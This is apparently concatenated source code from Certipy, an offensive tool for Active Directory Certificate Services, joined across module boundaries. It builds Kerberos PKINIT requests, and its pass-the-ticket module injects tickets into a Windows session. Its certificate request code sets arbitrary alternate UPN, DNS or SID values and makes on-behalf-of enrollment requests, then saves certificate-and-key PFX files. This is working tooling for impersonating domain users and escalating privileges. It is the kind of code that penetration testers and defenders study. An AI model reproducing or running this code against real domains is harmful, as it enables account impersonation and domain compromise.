	SMTP_NAME = 7     #(7),	-- Name in form of SMTP email name
	ENTERPRISE_PRINCIPAL = 10    #(10), -- Windows 2000 UPN
	WELLKNOWN  = 11    #(11),	-- Wellknown
	ENT_PRINCIPAL_AND_ID  = -130  #(-130), -- Windows 2000 UPN and SID
	MS_PRINCIPAL = -128  #(-128), -- NT 4 style name
	MS_PRINCIPAL_AND_ID = -129  #(-129), -- NT style name and SID
	NTLM = -1200 #(-1200) -- NTLM name, realm is domain

class Enctype(object):
    DES_CRC = 1
    DES_MD4 = 2
    DES_MD5 = 3
    DES3 = 16
    AES128 = 17
    AES256 = 18
    RC4 = 23


class DHNonce(asn1core.OctetString):
    pass


class AlgorithmIdentifiers(asn1core.SequenceOf):
    _child_spec = asn1x509.AlgorithmIdentifier


class Asn1KerberosTime(asn1core.GeneralizedTime):
    """KerberosTime ::= GeneralizedTime"""


class ExternalPrincipalIdentifier(asn1core.Sequence):
    _fields = [
        (
            "subjectName",
            asn1core.OctetString,
            {"tag_type": "implicit", "tag": 0, "optional": True},
        ),
        (
            "issuerAndSerialNumber",
            asn1core.OctetString,
            {"tag_type": "implicit", "tag": 1, "optional": True},
        ),
        (
            "subjectKeyIdentifier",
            asn1core.OctetString,
            {"tag_type": "implicit", "tag": 2, "optional": True},
        ),
    ]


class KDCDHKeyInfo(asn1core.Sequence):
    _fields = [
        ("subjectPublicKey", asn1core.BitString, {"tag_type": "explicit", "tag": 0}),
        ("nonce", asn1core.Integer, {"tag_type": "explicit", "tag": 1}),
        (
            "dhKeyExpiration",
            Asn1KerberosTime,
            {"tag_type": "explicit", "tag": 2, "optional": True},
        ),
    ]


class ExternalPrincipalIdentifiers(asn1core.SequenceOf):
    _child_spec = ExternalPrincipalIdentifier


class DHRepInfo(asn1core.Sequence):
    _fields = [
        ("dhSignedData", asn1core.OctetString, {"tag_type": "implicit", "tag": 0}),
        (
            "serverDHNonce",
            DHNonce,
            {"tag_type": "explicit", "tag": 1, "optional": True},
        ),
    ]


class PA_PK_AS_REQ(asn1core.Sequence):
    _fields = [
        ("signedAuthPack", asn1core.OctetString, {"tag_type": "implicit", "tag": 0}),
        (
            "trustedCertifiers",
            ExternalPrincipalIdentifiers,
            {"tag_type": "explicit", "tag": 1, "optional": True},
        ),
        (
            "kdcPkId",
            asn1core.OctetString,
            {"tag_type": "implicit", "tag": 2, "optional": True},
        ),
    ]


class PA_PK_AS_REP(asn1core.Choice):
    _alternatives = [
        ("dhInfo", DHRepInfo, {"explicit": (2, 0)}),
        ("encKeyPack", asn1core.OctetString, {"implicit": (2, 1)}),
    ]


class DirtyDH:
    def __init__(self):
        self.p = None
        self.g = None
        self.shared_key = None
        self.shared_key_int = None
        self.private_key = os.urandom(32)
        self.private_key_int = int(self.private_key.hex(), 16)
        self.dh_nonce = os.urandom(32)

    @staticmethod
    def from_params(p, g):
        dd = DirtyDH()
        dd.p = p
        dd.g = g
        return dd

    @staticmethod
    def from_dict(dhp):
        dd = DirtyDH()
        dd.p = dhp["p"]
        dd.g = dhp["g"]
        return dd

    @staticmethod
    def from_asn1(asn1_bytes):
        dhp = asn1algos.DHParameters.load(asn1_bytes).native
        return DirtyDH.from_dict(dhp)

    def get_public_key(self):
        # y = g^x mod p
        return pow(self.g, self.private_key_int, self.p)

    def exchange(self, bob_int):
        self.shared_key_int = pow(bob_int, self.private_key_int, self.p)
        x = hex(self.shared_key_int)[2:]
        if len(x) % 2 != 0:
            x = "0" + x
        self.shared_key = bytes.fromhex(x)
        return self.shared_key


class PKAuthenticator(asn1core.Sequence):
    _fields = [
        ("cusec", asn1core.Integer, {"tag_type": "explicit", "tag": 0}),
        ("ctime", Asn1KerberosTime, {"tag_type": "explicit", "tag": 1}),
        ("nonce", asn1core.Integer, {"tag_type": "explicit", "tag": 2}),
        (
            "paChecksum",
            asn1core.OctetString,
            {"tag_type": "explicit", "tag": 3, "optional": True},
        ),
    ]


class AuthPack(asn1core.Sequence):
    _fields = [
        ("pkAuthenticator", PKAuthenticator, {"tag_type": "explicit", "tag": 0}),
        (
            "clientPublicValue",
            asn1keys.PublicKeyInfo,
            {"tag_type": "explicit", "tag": 1, "optional": True},
        ),
        (
            "supportedCMSTypes",
            AlgorithmIdentifiers,
            {"tag_type": "explicit", "tag": 2, "optional": True},
        ),
        (
            "clientDHNonce",
            DHNonce,
            {"tag_type": "explicit", "tag": 3, "optional": True},
        ),
    ]


def sign_authpack(
    data: bytes,
    key: rsa.RSAPrivateKey,
    cert: Union[x509.Certificate, asn1x509.Certificate],
) -> bytes:
    if isinstance(cert, x509.Certificate):
        cert = asn1x509.Certificate.load(cert_to_der(cert))

    digest_algorithm = {}
    digest_algorithm["algorithm"] = asn1algos.DigestAlgorithmId("sha1")

    signer_info = {}
    signer_info["version"] = "v1"
    signer_info["sid"] = asn1cms.IssuerAndSerialNumber(
        {
            "issuer": cert.issuer,
            "serial_number": cert.serial_number,
        }
    )

    signer_info["digest_algorithm"] = asn1algos.DigestAlgorithm(digest_algorithm)
    signer_info["signed_attrs"] = [
        asn1cms.CMSAttribute({"type": "content_type", "values": ["1.3.6.1.5.2.3.1"]}),
        asn1cms.CMSAttribute(
            {"type": "message_digest", "values": [hash_digest(data, hashes.SHA1)]}
        ),
    ]
    signer_info["signature_algorithm"] = asn1algos.SignedDigestAlgorithm(
        {"algorithm": "sha1_rsa"}
    )
    signer_info["signature"] = rsa_pkcs1v15_sign(
        asn1cms.CMSAttributes(signer_info["signed_attrs"]).dump(),
        key,
        hash=hashes.SHA1,
    )

    enscapsulated_content_info = {}
    enscapsulated_content_info["content_type"] = "1.3.6.1.5.2.3.1"
    enscapsulated_content_info["content"] = data

    signed_data = {}
    signed_data["version"] = "v3"
    signed_data["digest_algorithms"] = [asn1algos.DigestAlgorithm(digest_algorithm)]
    signed_data["encap_content_info"] = asn1cms.EncapsulatedContentInfo(
        enscapsulated_content_info
    )
    signed_data["certificates"] = [cert]
    signed_data["signer_infos"] = asn1cms.SignerInfos([asn1cms.SignerInfo(signer_info)])

    content_info = {}
    content_info["content_type"] = "1.2.840.113549.1.7.2"
    content_info["content"] = asn1cms.SignedData(signed_data)

    return asn1cms.ContentInfo(content_info).dump()


def build_pkinit_as_req(
    username: str, domain: str, key: rsa.RSAPrivateKey, cert: x509.Certificate
) -> Tuple[AS_REQ, DirtyDH]:
    now = datetime.datetime.now(datetime.timezone.utc)

    kdc_req_body_data = {}
    kdc_req_body_data['kdc-options'] = KDCOptions({'forwardable','renewable','renewable-ok'})
    kdc_req_body_data['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': [username]})
    kdc_req_body_data['realm'] = domain.upper()
    kdc_req_body_data['sname'] = PrincipalName({'name-type': NAME_TYPE.SRV_INST.value, 'name-string': ['krbtgt', domain.upper()]})
    kdc_req_body_data['till']  = (now + datetime.timedelta(days=1)).replace(microsecond=0)
    kdc_req_body_data['rtime'] = (now + datetime.timedelta(days=1)).replace(microsecond=0)
    kdc_req_body_data['nonce'] = getrandbits(31)
    kdc_req_body_data['etype'] = [18,17]

    kdc_req_body = KDC_REQ_BODY(kdc_req_body_data)

    checksum = hash_digest(kdc_req_body.dump(), hashes.SHA1)

    authenticator = {}
    authenticator['cusec'] = now.microsecond
    authenticator['ctime'] = now.replace(microsecond=0)
    authenticator['nonce'] = getrandbits(31)
    authenticator['paChecksum'] = checksum

    diffie = DirtyDH.from_dict(DH_PARAMS)

    dp = {}
    dp['p'] = diffie.p
    dp['g'] = diffie.g
    dp['q'] = 0

    pka = {}
    pka['algorithm'] = '1.2.840.10046.2.1'
    pka['parameters'] = asn1keys.DomainParameters(dp)

    spki = {}
    spki['algorithm'] = asn1keys.PublicKeyAlgorithm(pka)
    spki['public_key'] = diffie.get_public_key()

    authpack = {}
    authpack['pkAuthenticator'] = PKAuthenticator(authenticator)
    authpack['clientPublicValue'] = asn1keys.PublicKeyInfo(spki)
    authpack['clientDHNonce'] = diffie.dh_nonce

    authpack = AuthPack(authpack)
    signed_authpack = sign_authpack(authpack.dump(), key, cert)

    payload = PA_PK_AS_REQ()
    payload['signedAuthPack'] = signed_authpack

    pa_data_1 = {}
    pa_data_1['padata-type'] = constants.PreAuthenticationDataTypes.PA_PK_AS_REQ.value
    pa_data_1['padata-value'] = payload.dump()

    pa_data_0 = {}
    pa_data_0['padata-type'] = constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value
    pa_data_0['padata-value'] = PA_PAC_REQUEST({'include-pac': True}).dump()

    asreq = {}
    asreq['pvno'] = 5
    asreq['msg-type'] = 10
    asreq['padata'] = [pa_data_0, pa_data_1]
    asreq['req-body'] = kdc_req_body

    return AS_REQ(asreq).dump(), diffie



NAME = "ptt"

import argparse
import base64
import platform

from impacket.krb5 import constants
from impacket.krb5.ccache import CCache
from impacket.krb5.kerberosv5 import getKerberosTGT
from impacket.krb5.types import Principal

from certipy.lib.logger import logging
from certipy.lib.target import Target


def load_ticket(ticket: bytes, decode: bool = False) -> CCache:
    if decode:
        try:
            logging.debug("Trying to base64-decode ticket")
            if type(ticket) == bytes:
                ticket = ticket.decode()
            ticket = base64.b64decode(ticket)
        except:
            return None

    try:
        logging.debug("Trying to load ticket as CCache")
        ccache = CCache(ticket)
        logging.debug("Loaded ticket as CCache")
    except:
        logging.debug("Failed to load ticket as CCache")
        logging.debug("Trying to load ticket as Kirbi")
        ccache = CCache()

        try:
            ccache.fromKRBCRED(ticket)
            logging.debug("Loaded ticket as Kirbi")
        except:
            return None

    return ccache


def entry(options: argparse.Namespace):

    if options.ticket and options.ticket_file:
        logging.warning("Both -ticket and -ticket-file specified. Using -ticket")

    ticket = None
    if options.ticket:
        ticket = options.ticket
    elif options.ticket_file:
        with open(options.ticket_file, "rb") as f:
            ticket = f.read()

    if not ticket and not options.req:
        logging.error("Not ticket specified and -req was not specified")
        return

    ccache = None
    if ticket:
        ccache = load_ticket(ticket, True)
        if ccache is None:
            ccache = load_ticket(ticket)
        if ccache is None:
            logging.error("Failed to load ticket")
            return None
    elif options.req:
        target = Target.from_options(options, ptt=True)

        username = Principal(
            target.username, type=constants.PrincipalNameType.NT_PRINCIPAL.value
        )
        tgt, _, oldSessionKey, _ = getKerberosTGT(
            username,
            target.password,
            target.domain,
            bytes.fromhex(target.lmhash),
            bytes.fromhex(target.nthash),
            target.aes,
            target.dc_ip,
        )

        ccache = CCache()
        ccache.fromTGT(tgt, oldSessionKey, oldSessionKey)

    if not ccache:
        logging.error("Failed to get ticket")
        return

    logging.info("Got ticket")
    if options.debug:
        logging.debug("Ticket:")
        ccache.credentials[0].prettyPrint()

    krb_cred = ccache.toKRBCRED()
    logging.info("Trying to inject ticket into session")

    if platform.system().lower() != "windows":
        logging.error("Not running on Windows platform. Aborting")
        return

    try:
        from certipy.lib import sspi

        res = sspi.submit_ticket(krb_cred)
        if res:
            logging.info("Successfully injected ticket into session")
    except Exception as e:
        logging.error("Failed to inject ticket into session: %s" % str(e))



import argparse
import re
from typing import List

import requests
from impacket.dcerpc.v5 import rpcrt
from impacket.dcerpc.v5.dtypes import DWORD, LPWSTR, NULL, PBYTE, ULONG
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
from impacket.dcerpc.v5.nrpc import checkNullString
from impacket.uuid import uuidtup_to_bin
from requests_ntlm import HttpNtlmAuth
from urllib3 import connection

from certipy.lib.certificate import (
    cert_id_to_parts,
    cert_to_pem,
    create_csr,
    create_key_archival,
    create_on_behalf_of,
    create_pfx,
    create_renewal,
    csr_to_der,
    der_to_cert,
    der_to_csr,
    der_to_pem,
    get_identifications_from_certificate,
    get_object_sid_from_certificate,
    key_to_pem,
    load_pfx,
    pem_to_cert,
    pem_to_key,
    rsa,
    x509,
)
from certipy.lib.errors import translate_error_code
from certipy.lib.formatting import print_certificate_identifications
from certipy.lib.logger import logging
from certipy.lib.rpc import get_dce_rpc
from certipy.lib.target import Target

from .ca import CA


def _http_request(self, method, url, body=None, headers=None):
    if headers is None:
        headers = {}
    else:
        # Avoid modifying the headers passed into .request()
        headers = headers.copy()
    super(connection.HTTPConnection, self).request(
        method, url, body=body, headers=headers
    )


connection.HTTPConnection.request = _http_request

MSRPC_UUID_ICPR = uuidtup_to_bin(("91ae6020-9e3c-11cf-8d7c-00aa00c091be", "0.0"))


class DCERPCSessionError(rpcrt.DCERPCException):
    def __init__(self, error_string=None, error_code=None, packet=None):
        rpcrt.DCERPCException.__init__(self, error_string, error_code, packet)

    def __str__(self) -> str:
        self.error_code &= 0xFFFFFFFF
        error_msg = translate_error_code(self.error_code)
        return "RequestSessionError: %s" % error_msg


# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wcce/d6bee093-d862-4122-8f2b-7b49102097dc
class CERTTRANSBLOB(NDRSTRUCT):
    structure = (
        ("cb", ULONG),
        ("pb", PBYTE),
    )


# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-icpr/0c6f150e-3ead-4006-b37f-ebbf9e2cf2e7
class CertServerRequest(NDRCALL):
    opnum = 0
    structure = (
        ("dwFlags", DWORD),
        ("pwszAuthority", LPWSTR),
        ("pdwRequestId", DWORD),
        ("pctbAttribs", CERTTRANSBLOB),
        ("pctbRequest", CERTTRANSBLOB),
    )


# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-icpr/0c6f150e-3ead-4006-b37f-ebbf9e2cf2e7
class CertServerRequestResponse(NDRCALL):
    structure = (
        ("pdwRequestId", DWORD),
        ("pdwDisposition", ULONG),
        ("pctbCert", CERTTRANSBLOB),
        ("pctbEncodedCert", CERTTRANSBLOB),
        ("pctbDispositionMessage", CERTTRANSBLOB),
    )


class RequestInterface:
    def __init__(self, parent: "Request"):
        self.parent = parent

    def retrieve(self, request_id: int) -> x509.Certificate:
        raise NotImplementedError("Abstract method")

    def request(
        self,
        csr: bytes,
        attributes: List[str],
    ) -> x509.Certificate:
        raise NotImplementedError("Abstract method")


class RPCRequestInterface(RequestInterface):
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

        self._dce = None

    @property
    def dce(self) -> rpcrt.DCERPC_v5:
        if self._dce is not None:
            return self._dce

        self._dce = get_dce_rpc(
            MSRPC_UUID_ICPR,
            r"\pipe\cert",
            self.parent.target,
            timeout=self.parent.target.timeout,
            dynamic=self.parent.dynamic,
            verbose=self.parent.verbose,
        )

        return self._dce

    def retrieve(self, request_id: int) -> x509.Certificate:

        empty = CERTTRANSBLOB()
        empty["cb"] = 0
        empty["pb"] = NULL

        request = CertServerRequest()
        request["dwFlags"] = 0
        request["pwszAuthority"] = checkNullString(self.parent.ca)
        request["pdwRequestId"] = request_id
        request["pctbAttribs"] = empty
        request["pctbRequest"] = empty

        logging.info("Rerieving certificate with ID %d" % request_id)

        response = self.dce.request(request, checkError=False)

        error_code = response["pdwDisposition"]

        if error_code == 3:
            logging.info("Successfully retrieved certificate")
        else:
            if error_code == 5:
                logging.warning("Certificate request is still pending approval")
            else:
                error_msg = translate_error_code(error_code)
                if "unknown error code" in error_msg:
                    logging.error(
                        "Got unknown error while trying to retrieve certificate: (%s): %s"
                        % (
                            error_msg,
                            b"".join(response["pctbDispositionMessage"]["pb"]).decode(
                                "utf-16le"
                            ),
                        )
                    )
                else:
                    logging.error(
                        "Got error while trying to retrieve certificate: %s" % error_msg
                    )

            return False

        cert = der_to_cert(b"".join(response["pctbEncodedCert"]["pb"]))

        return cert

    def request(
        self,
        csr: bytes,
        attributes: List[str],
    ) -> x509.Certificate:
        attributes = checkNullString("\n".join(attributes)).encode("utf-16le")
        pctb_attribs = CERTTRANSBLOB()
        pctb_attribs["cb"] = len(attributes)
        pctb_attribs["pb"] = attributes

        pctb_request = CERTTRANSBLOB()
        pctb_request["cb"] = len(csr)
        pctb_request["pb"] = csr

        request = CertServerRequest()
        request["dwFlags"] = 0
        request["pwszAuthority"] = checkNullString(self.parent.ca)
        request["pdwRequestId"] = self.parent.request_id
        request["pctbAttribs"] = pctb_attribs
        request["pctbRequest"] = pctb_request

        logging.info("Requesting certificate via RPC")

        response = self.dce.request(request)

        error_code = response["pdwDisposition"]
        request_id = response["pdwRequestId"]

        if error_code == 3:
            logging.info("Successfully requested certificate")
        else:
            if error_code == 5:
                logging.warning("Certificate request is pending approval")
            else:
                error_msg = translate_error_code(error_code)
                if "unknown error code" in error_msg:
                    logging.error(
                        "Got unknown error while trying to request certificate: (%s): %s"
                        % (
                            error_msg,
                            b"".join(response["pctbDispositionMessage"]["pb"]).decode(
                                "utf-16le"
                            ),
                        )
                    )
                else:
                    logging.error(
                        "Got error while trying to request certificate: %s" % error_msg
                    )

        logging.info("Request ID is %d" % request_id)

        if error_code != 3:
            should_save = input(
                "Would you like to save the private key? (y/N) "
            ).rstrip("\n")

            if should_save.lower() == "y":
                out = (
                    self.parent.out if self.parent.out is not None else str(request_id)
                )
                with open("%s.key" % out, "wb") as f:
                    f.write(key_to_pem(self.parent.key))

                logging.info("Saved private key to %s.key" % out)

            return False

        cert = der_to_cert(b"".join(response["pctbEncodedCert"]["pb"]))

        return cert


class WebRequestInterface(RequestInterface):
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

        self.target = self.parent.target

        self._session = None
        self.base_url = ""

    @property
    def session(self) -> requests.Session:
        if self._session is not None:
            return self._session

        if self.target.do_kerberos:
            raise Exception(
                "Kerberos authentication is currently not supported with Web Enrollment"
            )

        scheme = self.parent.scheme
        port = self.parent.port

        password = self.target.password
        if self.target.nthash:
            password = "%s:%s" % (self.target.nthash, self.target.nthash)

        principal = "%s\\%s" % (self.target.domain, self.target.username)

        session = requests.Session()
        session.timeout = self.target.timeout
        session.auth = HttpNtlmAuth(principal, password)
        session.verify = False

        base_url = "%s://%s:%i" % (scheme, self.target.target_ip, port)
        logging.info("Checking for Web Enrollment on %s" % repr(base_url))

        session.headers["User-Agent"] = None

        success = False
        try:
            res = session.get(
                "%s/certsrv/" % base_url,
                headers={"Host": self.target.remote_name},
                timeout=self.target.timeout,
                allow_redirects=False,
            )
        except Exception as e:
            logging.warning("Failed to connect to Web Enrollment interface: %s" % e)
        else:
            if res.status_code == 200:
                success = True
            elif res.status_code == 401:
                logging.error("Unauthorized for Web Enrollment at %s" % repr(base_url))
                return None
            else:
                logging.warning(
                    "Failed to authenticate to Web Enrollment at %s" % repr(base_url)
                )

        if not success:
            scheme = "https" if scheme == "http" else "http"
            port = 80 if scheme == "http" else 443
            base_url = "%s://%s:%i" % (scheme, self.target.target_ip, port)
            logging.info(
                "Trying to connect to Web Enrollment interface %s" % repr(base_url)
            )

            try:
                res = session.get(
                    "%s/certsrv/" % base_url,
                    headers={"Host": self.target.remote_name},
                    timeout=self.target.timeout,
                    allow_redirects=False,
                )
            except Exception as e:
                logging.warning("Failed to connect to Web Enrollment interface: %s" % e)
                return None
            else:
                if res.status_code == 200:
                    success = True
                elif res.status_code == 401:
                    logging.error(
                        "Unauthorized for Web Enrollment at %s" % repr(base_url)
                    )
                else:
                    logging.warning(
                        "Failed to authenticate to Web Enrollment at %s"
                        % repr(base_url)
                    )

        if not success:
            return None

        self.base_url = base_url
        self._session = session
        return self._session

    def retrieve(self, request_id: int) -> x509.Certificate:
        logging.info("Retrieving certificate for request ID: %d" % request_id)
        res = self.session.get(
            "%s/certsrv/certnew.cer" % self.base_url, params={"ReqID": request_id}
        )

        if res.status_code != 200:
            if self.parent.verbose:
                logging.error("Got error while trying to retrieve certificate:")
                print(res.text)
            else:
                logging.error(
                    "Got error while trying to retrieve certificate. Use -debug to print the response"
                )
            return False

        if b"BEGIN CERTIFICATE" in res.content:
            cert = pem_to_cert(res.content)
        else:
            content = res.text
            if "Taken Under Submission" in content:
                logging.warning("Certificate request is pending approval")
            elif "The requested property value is empty" in content:
                logging.warning("Unknown request ID %d" % request_id)
            else:
                error_code = re.findall(r" (0x[0-9a-fA-F]+) \(", content)
                try:
                    error_code = int(error_code[0], 16)
                    msg = translate_error_code(error_code)
                    logging.warning("Got error from AD CS: %s" % msg)
                except:
                    if self.parent.verbose:
                        logging.warning("Got unknown error from AD CS:")
                        print(content)
                    else:
                        logging.warning(
                            "Got unknown error from AD CS. Use -debug to print the response"
                        )

            return False

        return cert

    def request(
        self,
        csr: bytes,
        attributes: List[str],
    ) -> x509.Certificate:
        session = self.session
        if not session:
            return False

        csr = der_to_pem(csr, "CERTIFICATE REQUEST")

        attributes = "\n".join(attributes)

        params = {
            "Mode": "newreq",
            "CertAttrib": attributes,
            "CertRequest": csr,
            "TargetStoreFlags": "0",
            "SaveCert": "yes",
            "ThumbPrint": "",
        }

        logging.info("Requesting certificate via Web Enrollment")

        res = session.post("%s/certsrv/certfnsh.asp" % self.base_url, data=params)
        content = res.text

        if res.status_code != 200:
            logging.error("Got error while trying to request certificate: ")
            if self.parent.verbose:
                print(content)
            else:
                logging.warning("Use -debug to print the response")
            return False

        request_id = re.findall(r"certnew.cer\?ReqID=([0-9]+)&", content)
        if not request_id:
            if "template that is not supported" in content:
                logging.error(
                    "Template %s is not supported by AD CS" % repr(self.parent.template)
                )
                return False
            else:
                request_id = re.findall(r"Your Request Id is ([0-9]+)", content)
                if len(request_id) != 1:
                    logging.error("Failed to get request id from response")
                    request_id = None
                else:
                    request_id = int(request_id[0])

                    logging.info("Request ID is %d" % request_id)

                if "Certificate Pending" in content:
                    logging.warning("Certificate request is pending approval")
                elif '"Denied by Policy Module"' in content:
                    res = self.session.get(
                        "%s/certsrv/certnew.cer" % self.base_url,
                        params={"ReqID": request_id},
                    )
                    try:
                        error_codes = re.findall(
                            "(0x[a-zA-Z0-9]+) \([-]?[0-9]+ ",
                            res.text,
                            flags=re.MULTILINE,
                        )

                        error_msg = translate_error_code(int(error_codes[0], 16))
                        logging.error(
                            "Got error while trying to request certificate: %s"
                            % error_msg
                        )
                    except:
                        logging.warning("Got unknown error from AD CS:")
                        if self.parent.verbose:
                            print(res.text)
                        else:
                            logging.warning("Use -debug to print the response")
                else:
                    error_code = re.findall(
                        r"Denied by Policy Module  (0x[0-9a-fA-F]+),", content
                    )
                    try:
                        error_code = int(error_code[0], 16)
                        msg = translate_error_code(error_code)
                        logging.warning("Got error from AD CS: %s" % msg)
                    except:
                        logging.warning("Got unknown error from AD CS:")
                        if self.parent.verbose:
                            print(content)
                        else:
                            logging.warning("Use -debug to print the response")

            if request_id is None:
                return False

            should_save = input(
                "Would you like to save the private key? (y/N) "
            ).rstrip("\n")

            if should_save.lower() == "y":
                out = (
                    self.parent.out if self.parent.out is not None else str(request_id)
                )
                with open("%s.key" % out, "wb") as f:
                    f.write(key_to_pem(self.parent.key))

                logging.info("Saved private key to %s.key" % out)

            return False

        if len(request_id) == 0:
            logging.error("Failed to get request id from response")
            return False

        request_id = int(request_id[0])

        logging.info("Request ID is %d" % request_id)

        return self.retrieve(request_id)


class Request:
    def __init__(
        self,
        target: Target = None,
        ca: str = None,
        template: str = None,
        upn: str = None,
        dns: str = None,
        sid: str = None,
        subject: str = None,
        retrieve: int = 0,
        on_behalf_of: str = None,
        pfx: str = None,
        key_size: int = None,
        archive_key: bool = False,
        renew: bool = False,
        out: str = None,
        key: rsa.RSAPrivateKey = None,
        web: bool = False,
        port: int = None,
        scheme: str = None,
        dynamic_endpoint: bool = False,
        debug=False,
        **kwargs
    ):
        self.target = target
        self.ca = ca
        self.template = template
        self.alt_upn = upn
        self.alt_dns = dns
        self.alt_sid = sid
        self.subject = subject
        self.request_id = int(retrieve)
        self.on_behalf_of = on_behalf_of
        self.pfx = pfx
        self.key_size = key_size
        self.archive_key = archive_key
        self.renew = renew
        self.out = out
        self.key = key

        self.web = web
        self.port = port
        self.scheme = scheme

        self.dynamic = dynamic_endpoint
        self.verbose = debug
        self.kwargs = kwargs

        if not self.port and self.scheme:
            if self.scheme == "http":
                self.port = 80
            elif self.scheme == "https":
                self.port = 443

        self._dce = None

        self._interface = None

    @property
    def interface(self) -> RequestInterface:
        if self._interface is not None:
            return self._interface

        if self.web:
            self._interface = WebRequestInterface(self)
        else:
            self._interface = RPCRequestInterface(self)

        return self._interface

    def retrieve(self) -> bool:
        request_id = int(self.request_id)

        cert = self.interface.retrieve(request_id)
        if cert is False:
            logging.error("Failed to retrieve certificate")
            return False

        identifications = get_identifications_from_certificate(cert)

        print_certificate_identifications(identifications)

        object_sid = get_object_sid_from_certificate(cert)
        if object_sid is not None:
            logging.info("Certificate object SID is %s" % repr(object_sid))
        else:
            logging.info("Certificate has no object SID")

        out = self.out
        if out is None:
            out, _ = cert_id_to_parts(identifications)
            if out is None:
                out = self.target.username

            out = out.rstrip("$").lower()

        try:
            with open("%d.key" % request_id, "rb") as f:
                key = pem_to_key(f.read())
        except Exception as e:
            logging.warning(
                "Could not find matching private key. Saving certificate as PEM"
            )
            with open("%s.crt" % out, "wb") as f:
                f.write(cert_to_pem(cert))

            logging.info("Saved certificate to %s" % repr("%s.crt" % out))
        else:
            logging.info("Loaded private key from %s" % repr("%d.key" % request_id))
            pfx = create_pfx(key, cert)
            with open("%s.pfx" % out, "wb") as f:
                f.write(pfx)
            logging.info(
                "Saved certificate and private key to %s" % repr("%s.pfx" % out)
            )

        return True

    def request(self) -> bool:
        username = self.target.username

        if sum(map(bool, [self.archive_key, self.on_behalf_of, self.renew])) > 1:
            logging.error(
                "Combinations of -renew, -on-behalf-of, and -archive-key are currently not supported"
            )
            return None

        if self.on_behalf_of:
            username = self.on_behalf_of
            if self.on_behalf_of.count("\\") > 0:
                parts = username.split("\\")
                username = "\\".join(parts[1:])
                domain = parts[0]
                if "." in domain:
                    logging.warning(
                        "Domain part of '-on-behalf-of' should not be a FQDN"
                    )

        renewal_cert = None
        renewal_key = None
        if self.renew:
            if self.pfx is None:
                logging.error(
                    "A certificate and private key (-pfx) is required in order for renewal"
                )
                return False

            with open(self.pfx, "rb") as f:
                renewal_key, renewal_cert = load_pfx(f.read())

        csr, key = create_csr(
            username,
            alt_dns=self.alt_dns,
            alt_upn=self.alt_upn,
            alt_sid=self.alt_sid,
            key=self.key,
            key_size=self.key_size,
            subject=self.subject,
            renewal_cert=renewal_cert,
        )
        self.key = key

        csr = csr_to_der(csr)

        if self.archive_key:
            ca = CA(self.target, self.ca)
            logging.info("Trying to retrieve CAX certificate")
            cax_cert = ca.get_exchange_certificate()
            logging.info("Retrieved CAX certificate")

            csr = create_key_archival(der_to_csr(csr), self.key, cax_cert)

        if self.renew:
            csr = create_renewal(csr, renewal_cert, renewal_key)

        if self.on_behalf_of:
            if self.pfx is None:
                logging.error(
                    "A certificate and private key (-pfx) is required in order to request on behalf of another user"
                )
                return False

            with open(self.pfx, "rb") as f:
                agent_key, agent_cert = load_pfx(f.read())

            csr = create_on_behalf_of(csr, self.on_behalf_of, agent_cert, agent_key)

        attributes = ["CertificateTemplate:%s" % self.template]

        if self.alt_upn is not None or self.alt_dns is not None:
            san = []
            if self.alt_dns:
                san.append("dns=%s" % self.alt_dns)
            if self.alt_upn:
                san.append("upn=%s" % self.alt_upn)

            attributes.append("SAN:%s" % "&".join(san))

        cert = self.interface.request(csr, attributes)

        if cert is False:
            logging.error("Failed to request certificate")
            return False

        if self.subject:
            subject = ",".join(map(lambda x: x.rfc4514_string(), cert.subject.rdns))
            logging.info("Got certificate with subject: %s" % subject)

        identifications = get_identifications_from_certificate(cert)

        print_certificate_identifications(identifications)

        object_sid = get_object_sid_from_certificate(cert)
        if object_sid is not None:
            logging.info("Certificate object SID is %s" % repr(object_sid))
        else:
            logging.info("Certificate has no object SID")

        out = self.out
        if out is None:
            out, _ = cert_id_to_parts(identifications)
            if out is None:
                out = self.target.username

            out = out.rstrip("$").lower()

        pfx = create_pfx(key, cert)

        outfile = "%s.pfx" % out

        with open(outfile, "wb") as f:
            f.write(pfx)

        logging.info("Saved certificate and private key to %s" % repr(outfile))

        return pfx, outfile


def entry(options: argparse.Namespace) -> None:
    target = Target.from_options(options)
    del options.target

    request = Request(target=target, **vars(options))

    if options.retrieve:
        request.retrieve()
    else:
        request.request()



import argparse
import base64
import math
import os
import struct
import sys
from typing import List, Tuple

from asn1crypto import cms as asn1cms
from asn1crypto import core as asn1core
from asn1crypto import csr as asn1csr
from asn1crypto import x509 as asn1x509
from cryptography import x509
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives.padding import PKCS7
from cryptography.hazmat.primitives.serialization import (
    Encoding,
    NoEncryption,
    PrivateFormat,
    PublicFormat,
    pkcs12,
)
from cryptography.x509 import SubjectKeyIdentifier
from cryptography.x509.oid import ExtensionOID, NameOID
from impacket.dcerpc.v5.nrpc import checkNullString
from pyasn1.codec.der import decoder, encoder
from pyasn1.type.char import UTF8String

from certipy.lib.logger import logging

DN_MAP = {
    "CN": NameOID.COMMON_NAME,
    "SN": NameOID.SURNAME,
    "SERIALNUMBER": NameOID.SERIAL_NUMBER,
    "C": NameOID.COUNTRY_NAME,
    "L": NameOID.LOCALITY_NAME,
    "S": NameOID.STATE_OR_PROVINCE_NAME,
    "ST": NameOID.STATE_OR_PROVINCE_NAME,
    "STREET": NameOID.STREET_ADDRESS,
    "O": NameOID.ORGANIZATION_NAME,
    "OU": NameOID.ORGANIZATIONAL_UNIT_NAME,
    "T": NameOID.TITLE,
    "TITLE": NameOID.TITLE,
    "G": NameOID.GIVEN_NAME,
    "GN": NameOID.GIVEN_NAME,
    "E": NameOID.EMAIL_ADDRESS,
    "UID": NameOID.USER_ID,
    "DC": NameOID.DOMAIN_COMPONENT,
}

asn1x509.ExtensionId._map.update(
    {
        "1.3.6.1.4.1.311.25.2": "security_ext",
    }
)

asn1x509.Extension._oid_specs.update(
    {
        "security_ext": asn1x509.GeneralNames,
